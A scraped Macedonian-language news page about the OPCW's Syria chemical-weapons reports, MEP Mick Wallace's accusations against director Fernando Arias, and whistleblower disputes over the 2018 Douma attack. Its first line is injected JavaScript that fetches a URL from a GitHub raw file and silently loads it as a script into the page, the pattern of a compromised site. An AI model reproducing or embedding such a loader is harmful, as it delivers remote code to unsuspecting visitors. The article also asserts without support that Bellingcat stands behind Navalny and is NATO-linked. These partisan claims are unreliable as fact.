;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Хаос во Парламентот на ЕУ - Европратеник обвинет за „лажни вести“ поради обелоденување на скандал поврзан со Сирија - Антропол
АктуелноЕУИнтернационално

Хаос во Парламентот на ЕУ – Европратеник обвинет за „лажни вести“ поради обелоденување на скандал поврзан со Сирија

Организацијата за забрана на хемиското оружје (OPCW) играше важна улога во војната во Сирија, поради обвинувањата против Претседателот Асад дека користел хемиско оружје против сопствениот народ. Нивните заклучоци беа искористени за да се оправдаат воените дејствија на САД против Сирија. Последниот извештај на организацијата кој беше објавен денес зборува за таканаречени „основани сомневања“ дека хеликоптер на сириската армија фрлил хемиско оружје врз градот Саракиб во 2018 година. 

Меѓутоа повеќе пати излегоа информација од свиркачи внатре во организацијата кои фрлија сомнеж врз ваквите тврдења. Кога европратеникот Мик Волас се обиде да зборува за ова, тој беше обвинет дека шири „лажни вести“. Валас го обвини директорот на Организацијата за забрана на хемиското оружје, Фернандо Ариас, за уништување на докази дека Асад не стоел позади нападот во Дума во близината на Дамаск во 2018 година. 

„Зошто не ги слушате повиците на познати меѓународни експерти…за да се сретнете со сите членови на истражувачките тимови? Проблемот нема да исчезне. Дали ќе ги истражете сите аспекти на транспарентен начин?“ 

Тој не е единствениот кој ги оспорува официјалните тврдења. Сведочење на свиркачи и внатрешни документи сугерираат дека „клучни информации биле потиснати за хемиските анализи, токсиколошките консулации и сведочењата на очевидци“ со цел да се „поддржат претходно извлечените заклучоци.  Научен текст кој ги оспори заклучоците на Организацијата за хемиско оружје беше замрзнат после негодувањата на Белингкет (организацијата која стои позади Навални во Русија и анти-државните дејствија во Сирија) и загриженоста на еден директор дека доколку тие бидат објавени ќе бидат во прилог на Русија, сојузник на Асад. Покрај тоа, иако многу свиркачи ги оспорија заклучоците, многу повеќе „беа преплашени поради тишината“, еден од нив тврдеше минатата година. 

Валас исто така го обвини Ариас за игнорирањето на „лажно процурување на информации“ до БиБиСи и Белигкет, организацијата која е поврзана со НАТО, кои беа искористени за дискредитирање на поранешниот директор на Организацијата Хозе Бустани, кој се спротивстави на официјалното тврдење на Ариас дека Асад стои позади нападите во Дума.